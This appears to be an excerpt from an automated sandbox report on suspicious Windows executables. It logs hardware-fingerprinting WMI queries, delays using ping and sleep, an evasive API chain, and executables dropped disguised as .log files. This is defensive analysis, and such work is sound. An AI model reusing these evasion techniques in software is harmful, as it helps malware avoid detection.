Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe TID: 5508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 5376	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599878s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599391s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 6056	Thread sleep time: -10800000s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598843s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598163s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220	Thread sleep time: -594563s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\o9jDrpZrgR.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23646

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599878	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598163	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594563	Jump to behavior

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Window / User API: threadDelayed 1176			Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Window / User API: threadDelayed 8586			Jump to behavior

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eQQkRcVr.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SoilvDeL.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BhRGcQzx.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gRySjyoH.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BfMGYDNR.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vnjhvXId.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ESwXjeKp.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GbOXfjDL.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XieCzWia.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\egSCbkdO.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hLTAIczh.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jTkAEhsC.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sCEQoKxk.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MTqwIPIz.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KWPomPtF.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pwLIWFpU.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NBQmTGPX.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qtmQsFEO.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fNssmckm.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lGVRPIpa.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zdaXCUIW.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BnwYCmoX.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GVjFENOl.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QJNvoZJT.log	Jump to dropped file
Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HJnNqbKj.log	Jump to dropped file
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eOLjNPjM.log	Jump to dropped file

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599878	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598163	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	Thread delayed: delay time: 594797	Jump to behavior
